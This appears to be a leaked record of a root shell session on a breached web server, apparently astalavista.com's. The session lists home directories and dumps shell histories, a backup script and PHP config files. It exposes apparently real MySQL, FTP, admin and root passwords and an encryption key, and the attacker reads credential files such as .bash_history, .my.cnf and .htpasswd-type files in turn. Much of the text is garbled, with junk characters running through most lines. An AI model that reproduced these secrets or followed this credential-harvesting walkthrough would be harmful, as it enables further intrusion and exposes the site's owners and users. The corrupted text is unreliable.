astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
- s$ y: ]- s6 p6 B" \/ G3 T& T% l8 c
sh-3.2# cat /etc/motd
0 }# }7 e: h. e7 }9 }; R1 o#####################################################1 O8 J2 u4 a+ h' j) \
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
0 j5 _9 {+ b& @ t# |__| [__ | |__| | |__| | | | [__ | |__| #0 ?$ Y$ X# w# ~2 [7 |. N
# | | ___] | | | |___ | | \/ | ___] | | | #9 ]2 X' Z( ~8 R, X9 M. L$ i0 K6 k- C
# #1 O& w$ }7 j5 @
#####################################################
0 z* Y" r# q7 _! s$ w. p# #
# p H1 G4 K, [6 R# Admin Contact - 链接标记support@secureservertech.com #% `- r# f! b9 {/ u3 H @; j& y
# #+ L$ I* v. y: `6 `: ]4 ~
# Available ShortCuts #1 c) Q2 @- D/ r
# #9 y4 j: _( E! l7 ^ \1 \
# nst - list active connections #
0 n5 ]6 g$ `& I- W1 T. F# ddos - shows how many times each ip is connected #7 l: A! @; x( ^/ S2 R5 X
# ltr - restart the webserver #
9 L) {8 \# v1 O {5 s9 F# phpc - edit the php config file #
4 n% \ i3 M( x& x' i# htc - edit the webserver configuration file #: D+ N0 [- C! _+ O9 \% N: w, u: Q
# up - uptime #
( Y h" S1 ^& W$ A# etd - edit the motd of the day file #
0 R& N, o6 {% Z M: l1 B5 `: e# htr - start and restart apache if needed #
3 Y5 b7 C, M; M- {# \0 Z# syng - shows active SYN_RECV connections #; W$ @& ~4 w0 E: ^0 {- L- a5 P
# synd - syn flood blocker - “synd -h” for usage #0 M1 ^' s, {1 m- _5 ?" c+ [
#####################################################
4 r8 N, z3 u$ A% b. Z# NOTES: # \/ U `# b$ S- [
# Last Upgrade - 12-08-2008 by JF #% L, f" @- ~5 ?1 e: r
# My.cnf/Mysql Optimization - 1-28-09 #) d! j3 _+ g, r: q R
# #0 k. q9 P! b0 U8 }0 \3 O3 ~
# #
3 ~3 G6 V5 [4 h l# #* }0 w9 u# x4 v2 X1 v' v
#####################################################& m: O w& i1 c; m( ^* B* d
8 S+ B5 O. S& j3 {sh-3.2# lastlog | grep -v Never4 [" C. ]. f* W! _
Username Port From Latest
( W* ? [1 l$ T/ L6 ?root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
; d/ Q- _& g& a9 Y# w* d$ iadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008$ i9 m A7 O" E
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
, b8 D6 A) h pastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009+ N5 A) Q* Y# w8 c8 `
. Y+ L `: r1 @7 |sh-3.2# ls -la
2 c: u4 Q9 M7 S: M" ?/ Jtotal 453376% U }4 C* c, L5 Z( D
drwxr-x— 15 root root 4096 Jun 4 08:40 .
' L3 l! ?9 C* f" m/ w. l* S/ |, bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 W# T4 C, y. z1 k7 V-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
% n3 _ c8 x" d-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
# P2 o' \' E, i. o: b-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
# a6 a1 F5 y. U1 {! O-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout( w$ m V7 X1 p" K& e! \$ t5 a
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
$ {7 ~# q9 T/ ?: O" d/ g5 G-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
* J" z) x, l6 n) w-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
! r5 g1 s2 M9 \9 ?-rw-r–r– 1 root root 1327 Nov 29 2007 cert4 T- o5 |7 Y1 `% l
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
6 K9 }8 Z- Y. Bdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan @( O3 x5 x4 c r) ]: K
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc9 N0 e* I; Z$ c5 w5 M- X3 D5 J- m
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 @* f$ v+ M% a; n: G, a. I( ~) @# Ldrwx—— 2 root root 4096 Oct 28 2007 .elinks! d% n- f% t1 Q2 m
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.14 Z- L4 T# L1 \9 ~
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2+ E- h/ Z5 J( l2 S. h0 C' Y
-rw——- 1 root root 0 Apr 16 13:19 .history2 E% I' _: v" O$ ?6 V; w1 t8 M2 b4 a
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
0 B$ ^2 J' B+ v5 `+ m% L/ d- g-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
! v# c% Y( `) U# T; h Z-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
: f/ \. k+ Q H5 H% v; C. z-rw——- 1 root root 35 Jun 2 14:23 .lesshst
5 s7 S, h9 H' fdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
# F5 s# y8 i, I2 E6 r" Ddrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec; O3 e& o. T" Y; L9 \! ]1 B8 u
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz" ]; u; h0 k. o) c
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
! o* h" Z$ ?( J! n R-rwx—— 1 root root 760 Sep 18 2008 lp
- V& F1 ?* b: m D/ M4 E( Sdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1/ i6 ]. l0 `- a" r
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz% F' i- R! H" {0 U
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1& }+ g$ {# m7 R6 P9 H! A/ s
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9/ f: w; y5 I3 _
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
! d- p8 g! V! [6 l; Jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
2 a# J- o. ?* c, L% x9 v- f-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz6 \1 D. z: S" N
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
3 Y# D7 k0 \2 ?, |8 X( A% g-rw——- 1 root root 41 Oct 19 2007 .my.cnf
6 F- s% X( N. ]' v-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
$ o( q, Y* a: B/ ~-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport" d- i& j9 F) f/ q+ b
-rw——- 1 root root 41 May 20 2008 .mytop5 l' D" h, `: _; _5 k5 u# x1 _
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.64 l' \8 o& Q5 w! r* b* g( F6 d
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz8 m& r' N& \6 y, M7 E: U
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
7 H0 l) B" v/ K-rw——- 1 root root 1462 Sep 21 2007 opt.php
6 c/ l3 U1 s9 E-rw-r–r– 1 root root 3371 Sep 22 2007 p
8 H& |. F% i6 ?+ B7 u-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2. a+ | \/ P1 q6 R3 D, t
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
! e4 R$ J2 t8 \8 T! _! V0 I' E y9 M-rw-r–r– 1 root root 716 Nov 28 2007 server.csr; _( W* X8 S( l/ l5 |7 m
-rw-r–r– 1 root root 887 Nov 28 2007 server.key3 S& g! W: S$ @$ R7 a0 x- i( u
drwx—— 2 root root 4096 Oct 10 2008 .ssh
0 l5 x0 I6 _9 r* i0 ~-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat/ v: w8 D k6 F& ^ C
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc8 \$ { D; J" X" G0 ]4 z2 j0 |
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip4 p' J! z1 J3 y2 s! A# N: k
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.13 p( T# G/ U* s; e. L
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp. j* c Y& t: Y8 m1 N
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh' P# T% \$ J" @- \, q/ O( W
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.09 y' S7 a% d/ u+ D6 U; [
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz26 [7 N, F8 t. X5 ^) C0 Z7 P5 K
-rw——- 1 root root 12997 May 16 2008 .viminfo
+ X$ |& }. }1 P. e
+ t, E& `+ E5 f" t- t* k; Q/ Q7 Fsh-3.2# cat .bash_history% n; ]" ~) Z6 r: |
[snip]$ P: y6 ?5 Y; d" n
wget cp4sst.com/sstlinux.tar.gz" D2 x& l" c2 |. p
tar zxvf sstlinux.tar.gz
- g o3 [ W; C% M; r6 n, tcd linux-2.6.27.108 j( T" a. d) g5 h1 s& e( d3 O
sh install.sh% @3 K+ K9 o' y9 V5 p. x4 T
make bzImage ; make modules ; make modules_install ; make install" t* p' @) M2 c9 e4 d) N5 I r* K u
make clean
w( R0 q3 |* c5 b' iservice mysqld restart5 I0 y4 P \) L6 X# N
[snip]
* p9 p* l) G K7 H0 tcd /usr/sbin/5 S6 ]% I1 b' k6 Q' L( m$ t s* e4 T
chmod 4777 traceroute$ t2 m0 u, s$ U( q: Z
chmod 4777 ping
$ _; k& K3 X A, J2 e0 j; ptraceroute -I 链接标记[url]www.astalavista.ch[/url]
+ `% V9 g' X& I4 v6 X! W- Q[snip]) Y. X0 S3 e( o( g0 A' \
vi /etc/csf/csf.conf
7 U+ @ ?: q# Qtraceroute google.ch
& G' |: E* M0 w0 S4 x7 e' t8 o! Fservice csf restart3 T' |6 W# U1 g7 K3 d1 {6 R1 j
tracert google.ch1 U6 F$ h' ~* f) O
service csf restart$ ?' o, a$ p5 H+ g0 c
traceroute 链接标记[url]www.google.ch[/url]
0 F9 r c6 b6 g, d( t7 Ktracert 链接标记[url]www.google.ch[/url]0 s N9 n* F. H- l/ S+ {: M& S
traceroute 链接标记[url]www.google.ch[/url]
. z8 a" B% o/ X- a7 ^+ Nlocate traceroute, |; J! Q/ T1 d/ n7 q
chown 4755 /bin/traceroute
; B' N' z% {/ A( k9 ?+ M7 }chown 4777 /bin/traceroute; k: a8 ^6 c+ {! Q Z% p
locate ping+ ~& s4 |7 V' v0 E. y
chown 4755 /bin/ping
9 |- x: V6 U2 p- u, |/ Y/ Q3 p: k% ]chown 4777 /bin/ping, P% [) ]' Q" i9 \& x9 d. ~9 s C
cd /bin/
, y5 S# }( {1 Kls -ali | grep ping
5 H* b5 w& z( m2 O6 _- |; Xchown root ping+ p8 T- r, \' { b8 R$ y
chmod 4755 ping
; K" |1 _0 E9 w0 x/ gls -ali | grep traceroute7 s: i1 Z, s7 b0 u9 w+ [
chown root traceroute5 k% N: |4 `" f z: p& ^
chmod 4755 traceroute
/ c, S7 a, ^* J6 H- E7 M$ Dls -ali | grep traceroute
1 f0 `: ? R/ B; u3 Gtraceroute -I 链接标记[url]www.google.ch[/url]
7 s7 m6 N$ I- V8 Ftraceroute 链接标记[url]www.google.ch[/url]
o4 ?, @, _1 J% r4 h# ^whois pmsantos.ch5 D: I# @! z( g$ `, T5 v0 U
[snip], G* t k* T ?7 s6 A" ?
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
6 p1 H9 o. W5 Y) o, z; V8 omysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
( b" @! p) y7 Kmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
0 v# j1 K( x' h! Y Omysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
& X9 Z. n T6 s u3 ntop
: w1 R( P2 b( C/ f3 B7 I3 ]: oping ssth.ch7 |, Y( i7 w7 c0 Z6 r0 I
ping asdlkfaljgasd???ljg???lasj.ch" I% m2 A1 [- b/ q0 L6 p
ping asdlkfaljgasdlasj.ch, a0 a, a% k/ l. ?$ J* S+ H2 x3 N' z* {
ping 链接标记[url]www.ssth.ch[/url]& H( v4 S1 y5 S1 S- [
ping ssth.ch2 A0 t, f/ R3 f0 ~9 S5 ~. | i
nslookup 链接标记[url]www.google.ch[/url]
( J8 B+ |0 u7 j0 N' anslookup 链接标记[url]www.ssth.ch[/url]
4 F* \5 q8 j$ }/ mman nslookup8 S O+ u' T/ q( I
ping 链接标记[url]www.google.ch[/url]
$ J: D* H- Z0 e+ B2 qnslookup 链接标记[url]www.google.ch[/url]. e* w: u' \/ Y7 V: ~
nslookup 链接标记[url]www.google.ch[/url]- m; S, B Z1 ~% E1 v' L6 H- [! b7 X
nslookup salfjasdlf.ch
7 }( q0 v" i- r, l; P9 s- L[snip]4 |$ A8 C/ v L* X- E
openssl passwd -1 sadf
1 X/ J$ S0 c1 R' }0 ?openssl passwd -1 5cZNHstdTy
, [2 B; `3 G2 }0 A P- w' m1 z' j# S3 H* Imysql; Q. e" ^$ G' C; [# P7 a( K5 W
mysql
- ^- p6 U: w% u: O/ q. rlocate proftp3 n7 t0 M) G0 w# g/ Z9 t
vi /etc/proftpd.passwd
8 A$ A! d, K8 n( e! sservice proftpd restart
# z0 q& |; ]0 n( jlocate proftpd.conf
{$ w' z8 d5 N( tvi /etc/proftpd.conf
2 U* {: z) t- m2 S5 Y+ x+ Ivi /etc/proftpd.passwd
5 l4 t& v% d5 o5 jservice proftpd restart7 e" P5 A9 t3 b5 q. \
[snip]
1 b* N9 G- S6 E8 U5 C& q! D/bin/sh /home/com/backup_system/backup.sh4 F5 i" z# D; p
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
3 P1 `% h6 Y9 Wmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
' z: _$ q2 ?. C; ]/ k% Umysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
+ c+ S5 Q9 l- R; I" P2 M4 zls -ali$ a& ?3 z# L/ r) y# }
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
% A5 Q) N: V, m3 f" d9 ^0 f, ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
0 e& m4 M5 M/ Hcrontab -l
* G* t* G& @* y9 [crontab -l, C! n: u( _6 ]2 B5 X
php -q /home/com/public_html/modifications/cronjobs/securitynews.php2 {& E* _6 O% I% l3 d
/home/com/public_html/modifications/cronjobs/exploits.sh) E0 n1 _7 i" U6 a+ |
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
2 w+ R% a' i, y, k3 a/ V% ttar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
! |4 f( I: S8 ^' `6 M$ q" bcd lsws-4.0.3: G/ b+ S' l7 A7 T. B
sh install.sh
) p2 n* u$ b7 fuptime1 h* n( \8 E5 y* J
hdparm -tt /dev/sda
) @- [% ]# } W" X' fiostat% m9 d0 n, X6 v X
yum install iostat
2 [7 f1 L( g; q+ T N, niostat3 c8 I4 r8 N* H) M1 B" X$ z
whereis iostat/ `& c" s% t4 v7 R3 r q& F
yjm clean all( E- C5 t- y/ R o
yum clean all ; yum -y update6 _( d) c& |4 e3 }' J( N% ?
iostat
. V* {& k7 h9 @! C& Ayum install systat
7 P" h% i5 {$ ]6 y& s9 r" x6 i! wrpm -qa | grep iostat- O( y+ _2 p' j/ Z* S
rpm -qa | grep sysstat+ T6 }( z& `+ F5 X$ |
rpm -qa | grep systat. \3 }0 x! h A# W, i' b ^" X" T
dmesg -c8 M# D% }7 s/ k6 X
sysctl -p, k1 \ w: @+ V4 y
uname -r4 U- X! L- ?- `
cd /usr/src1 u b% P: V8 b4 j( k
wget nix101.com/kernels/sstlinux.tar.gz
! e- G% E* d) W4 Dshutdown -r now
- x- ? a b# Q t+ K+ w- L2 Hnano -w /boot/grub/grub.conf* L, l. X4 O( g f% w
. X1 D9 H- {, T8 o( w; j1 Ssh-3.2# cat .my.cnf
9 {- X4 w/ q- n+ o) N[client]7 H0 ~- X: ]% s/ K4 P- w6 b. H
user=da_admin- t5 W; L; H2 Q# j8 U4 Y
password=X9dctmRH
: w- ?. a. Z5 U& |7 ~: I& j
/ l T2 j1 x `" p5 nsh-3.2# cat /home/com/backup_system/backup.sh
- f3 `3 L, p+ g3 B: r) S& X#!/bin/sh
- v! X4 O7 {" n; y) m, l#####################################################################, @/ G- Z D$ g7 ~5 P0 P8 F
# #1 ? X6 W" M" s( \- M
# incremental backup for astalavista.com #
8 {* z2 r( e L" j. D' i# #6 S5 J# S N: e. B. E; M' X# a! r
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
% A7 X9 b: D/ |% ~# ## B" o' ~! c6 s5 s# f3 h* Q
#####################################################################
. ^0 h/ E4 d: v# j0 i' F[snip]: s% H7 P8 R5 Y1 d
PROG_DIR=”/home/com/backup_system”;
3 n$ T1 l h% `% rBACKUP_DIR=”/home/com/backups”;
2 y9 z. v4 X& }+ G2 r# K# xDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;2 A7 ]* T/ n. M$ W2 r
# ftp for synology backup server
( M9 K- @) c6 n) UFTP_HOST=”212.254.194.163″;
% o3 Q: m& q( e$ f( tFTP_PORT=”21″;
/ ]2 Y4 ?5 f3 m% S( ~3 o( b- [FTP_USER=”astalavista.com”;, K/ i' u# Z" p, R* o! s$ b2 ?
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;* }4 s9 [ y8 z
FTP_DIR=”/astalavista.com”;: X8 d& t# g2 t0 q
# database
0 o3 n; `& M# o, e9 l- U Y" ~: CDB_HOST=”localhost”;
9 M1 G; Y6 T4 A* p, h4 uDB_USER=”contrexxuser2″;
0 d; {; |' _9 ?0 }9 U* q" }DB_PASS=”0fEYNZgXz1pKe”;
# `" G' }& [# @$ o3 y! r9 F7 cDB_DATABASE1=”com_contrexx2_live”;# q2 k* p" Z% }' p, ]: l* u j
DB_DATABASE2=”com_contrexx2″;3 b$ b E! d) J% m
[snip]
: G8 o( h; {3 E! Nftp -in $FTP_HOST $FTP_PORT <<EOF) H; l+ T j2 e0 T/ b' ]& z
quote USER $FTP_USER& G! ^1 x5 A+ Y; Q9 N( a
quote PASS $FTP_PASS& q+ n3 {* g( T$ ] X, Y) Y
cd $FTP_DIR( F/ G1 G! D: j
put $DB_FULLNAME-SQL_Dump.tar% Q, c& h% H% S! U/ y5 D; h5 e
put $BACKUP_FULLNAME-Public_HTML.tar0 [$ b' M# y5 q K4 r
close
( Y( ?' {' I# `* a2 U) tbye1 a( W/ X6 t% @9 E7 f+ z
EOF+ Y7 Z w+ }5 R: V3 V4 e) }- A+ [0 C
4 z( Z K1 \# u% R+ ^: K9 h$ V
sh-3.2# cd /home9 y% p# w" Y* m) W9 X
sh-3.2# ls -la
C ] a' j* Ztotal 120
( L3 o; S% R D0 \! B# Z Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .( S* H, Z1 l- x" \) n; w
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ D* G x3 u c. T7 q. Ndrwx–x–x 9 admin admin 4096 Nov 28 2007 admin5 B% T+ A7 U2 J7 R6 ~
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group* s( d1 P" j% b3 X# F& B
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user6 D3 @( u: N p9 F( w7 @" _( V
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet3 k* |1 B7 {# y1 E3 r5 E6 a* W
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup( B# F6 r4 F! e! w4 Z: I
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
3 w& S8 f! o! F, Sdrwx–x–x 10 com com 4096 Apr 28 12:40 com
, W8 M8 z2 J# O6 V$ ~: tdrwxr-xr-x 2 root root 4096 May 17 2007 ftp: |9 m) I/ z! a5 X# ?. n
drwx—— 3 jon jon 4096 Sep 21 2007 jon
0 Q- `. m! r8 Adrwx—— 2 root root 16384 Sep 11 2007 lost+found( l! {) @0 B, Y' I$ l* w
drwxr-xr-x 2 root root 4096 Sep 14 2007 my7 ^7 r6 H2 b$ U/ B' R
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata) a8 F1 d" v: V5 K( L$ t
drwx—— 2 jon jon 4096 Sep 15 2007 test
3 _/ L' `* U; hdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp$ X- V% J% E3 S/ E" o- c% z: S% z
o! A) }) p+ C Z
sh-3.2# cd admin
( Z" ?& G% z2 @0 D& z+ A# esh-3.2# ls -la
; E7 `- Y& _9 D0 ktotal 1735896
: F: k$ H5 r, z3 A9 x$ E4 odrwx–x–x 9 admin admin 4096 Nov 28 2007 .
0 |1 B& m% i: C$ a; edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 e7 R+ t& x) C7 ~- u, `% c3 e4 _( u
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
% k# w" L/ M1 f' Cdrwx—— 2 admin admin 4096 Sep 28 2007 backups) w8 t- i6 Z$ W( j3 g
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
, Z0 g7 ~# [' z-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
, R: z3 ^8 W7 v5 E$ Q-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
; }9 m! a, F3 K3 j0 `: K-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc& a& i2 p8 e$ V6 _/ j
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups U& V6 H# _$ \5 I* t; ^
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains4 W: k9 Z1 _9 @. p! ~4 O5 ^
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
$ J& S; _8 C3 p+ _2 \ P( \-rw-r–r– 1 root root 24 Sep 21 2007 info.php
$ i# J9 W, O6 b7 H. H( Kdrwx—— 2 admin admin 4096 Sep 21 2007 mail# T: f& Z" _3 E5 L! W& M$ {
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr3 q, F8 p! B( }9 k
-rw-r–r– 1 root root 887 Nov 28 2007 server.key6 E; p7 D+ P( e
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
; t& e! p4 d* d3 i-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
; V2 C7 C- |; F. H, `+ X5 [drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups9 U) D1 X7 X1 @9 I
3 ?9 i1 r: ?- G2 X$ c2 Q! H: D
sh-3.2# ..
& c2 u3 _3 x/ W) V" ^% Esh-3.2# cd jon
]4 Y- m e6 D9 jsh-3.2# ls -la0 I9 \1 D, Y* O! U1 [8 p
total 36
' w3 M) g( \* U, f4 _* Sdrwx—— 3 jon jon 4096 Sep 21 2007 .
* r: P1 c) B7 Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .., X7 B# _$ d$ q" A# w& R9 b
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history$ a0 X0 j+ g9 M! U7 H( C
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
' b2 A, D/ `7 k2 C6 s" G7 @ b, `-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile) v* S+ c1 y' m( n% {5 d+ Z
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc4 y0 J0 `3 _! c* p
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
9 ^- D+ {9 V Idrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html1 G; _ r1 O% _! d* ` Z
2 I4 {! \- Z% g4 G& e- \" U
sh-3.2# cd ../ W y% e! L9 k$ G, J% a+ Q1 k2 ?
sh-3.2# cd test) F$ R0 ^6 k/ s( f. ]0 F9 x! C
sh-3.2# ls -la
+ n6 J* ^. t9 o/ i, }6 jtotal 48
2 n0 T% L) z: ~' ^' g4 Mdrwx—— 2 jon jon 4096 Sep 15 2007 .
, q, b, t$ H' {; ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..# N& \/ E4 T) { {. J
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
8 e! N" I2 U) j i. S, |) F-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout: i1 p2 d5 f/ q" \9 A
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile" j/ D, E. }' R0 V: ?. A
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc5 _$ S- e' {. [7 V3 v
sh-3.2# cat .bash_history
7 ]7 S; G- w: O5 y- p/usr/bin/mysqladmin -u root password PoliuJhytg67
( p: A3 n: a$ _2 n- w B1 t# t' y
sh-3.2# cd ..1 H( L9 G0 \1 k: u# }# n9 ?, \
sh-3.2# cd astanet' e5 s3 D5 s$ N* x: p7 s
sh-3.2# ls -la i: u- N" K9 y k' H6 B
total 52
+ I! a* Z9 ~5 ^- X& m y! ]drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
/ _! G! k- j. gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# o3 a7 X, r$ H7 [( E& F) L6 Pdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
2 c* d, _1 ~2 M7 r- p-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- D: L' z* P% b- ]
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ r) Y( Z6 J* R: {, q-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
8 s+ X/ [6 q3 h& y-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
8 Z# ~, a4 d; d3 q6 b1 E% Fdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
9 _- X: o& H$ ~3 o0 Tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap; _& x1 U* @" f1 V$ x' v( Z$ Q
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
3 x2 Q: P8 [) R8 n-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
8 h! b ]9 I, rlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
- V. ?, \9 h6 D! x# S0 i# A6 F2 o-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow. J) I' X& v' L
' I, m% a8 C1 W: s/ i
sh-3.2# cd auth/
; `; M; V1 @% t) { Jsh-3.2# ls -la
/ U! }$ T, [: ototal 28
1 q. z- s+ V6 y8 J2 qdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
/ c( O, }) D, h( N; D! Zdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
( z- h6 [9 Q( a" P( J# |1 M7 V-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php) r b8 w2 ]! C+ o0 B2 u# N
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php) @/ g Z( E# @- S- ~. @7 v
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd7 P$ m4 Z2 {( B. q8 c- @0 q
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting" X/ T7 W7 T: c- m; b7 x3 G
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
) q5 p9 j2 p2 J. P/ l
/ @9 K$ U( h6 ?- O' t# _& s# X& |sh-3.2# cat hackercontest.config.inc.php
# p( f7 ^4 l6 J5 ~3 }1 n<?PHP( G0 j( F3 E; R; h+ M" c1 J# s' b
// Variabeln f?r Verbindung zur Datenbank //
1 H" h9 v$ s2 I; I+ `) {$ B# g$conxHost = ‘localhost’; // MySQL hostname
3 G" y8 B3 ]! U" w$ ]$conxUser = ‘hackercontest’; // MySQL user
2 G, s* Q; f' f1 o9 @5 j$conxPassword = ‘K6m@7dUc’; // MySQL password
0 E1 L8 z, @8 a( {$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
' a* D: I/ u+ c$ Z5 @6 h?>
9 N& Q" k; X3 g: hsh-3.2# cat hosting.config.inc.php+ [# z) J- z4 @
<?PHP
H+ E/ |; B9 q! J7 O& b9 ]: m+ z7 h// Variabeln f?r Verbindung zur Datenbank //
& P& d0 Q; f0 J$ U; V' u$conxHost = ‘localhost’; // MySQL hostname
: V$ ]7 h# B4 t$conxUser = ‘hostinguser’; // MySQL user
% d4 e+ p7 G( W2 J, i$conxPassword = ‘cXvB3981′; // MySQL password
' S2 q$ g# i9 y4 y. @8 ?) T$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
: Y5 ]' a* }% d/ v" _: W3 g8 W. D?>0 L8 T, Q' K8 o/ R( S
7 V6 }& A" F/ b" q* i$ y5 {sh-3.2# cd .., h' V5 y, [% b) H! l. J) _- _
sh-3.2# cd com
: z- J2 Z7 ?9 u# vsh-3.2# ls -la' Z5 |, `$ s; ~5 p8 J
